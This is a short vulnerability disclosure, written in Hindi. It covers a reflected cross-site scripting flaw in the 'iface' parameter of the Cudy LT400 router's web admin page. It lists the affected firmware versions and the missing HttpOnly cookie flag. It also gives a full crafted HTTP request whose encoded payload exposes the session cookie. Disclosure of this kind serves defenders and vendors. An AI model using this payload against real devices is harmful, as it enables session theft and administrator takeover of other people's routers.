
Cudy LT400 वेब इंटरफ़ेस में प्रतिबिंबित XSS के लिए प्रूफ-ऑफ-कॉन्सेप्ट, क्राफ्टेड अनुरोधों के माध्यम से सत्र कुकी चोरी और व्यवस्थापक अधिग्रहण का प्रदर्शन।
Cudy LT400 के वेब-आधारित प्रबंधन इंटरफ़ेस में एक प्रतिबिंबित क्रॉस-साइट स्क्रिप्टिंग (XSS) हमला मौजूद है।
पेज /cgi-bin/luci/admin/network/wireless/status में iface पैरामीटर के माध्यम से प्रतिबिंबित XSS मौजूद है।
शोषण के तरीकों में पीड़ित को एक विशेष रूप से तैयार अनुरोध भेजना शामिल होगा जिसमें दुर्भावनापूर्ण कोड शामिल हो।
प्रभावित एप्लिकेशन सत्र कुकी को HttpOnly विशेषता के साथ सेट नहीं करता है; इसके परिणामस्वरूप सत्र टोकन चोरी के माध्यम से व्यवस्थापक का अधिग्रहण हो सकता है।
कमजोर फ़र्मवेयर संस्करण: 1.13.4 - 1.15.18 - 1.15.27
GET /cgi-bin/luci/admin/network/wireless/status?iface=wlan00%22%29%27%20href%3D%22javascript%3Aalert%28document.cookie%29%3B%22%3Exss%3C%2Fa%3E HTTP/1.1
Host: 172.16.1.1
User-Agent: Mozilla/5.0
Accept: text/html, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://172.16.1.1/cgi-bin/luci/
Cookie: sysauth=REDACTED
शेन्ज़ेन कूडी टेक्नोलॉजी (Shenzhen Cudy Technology)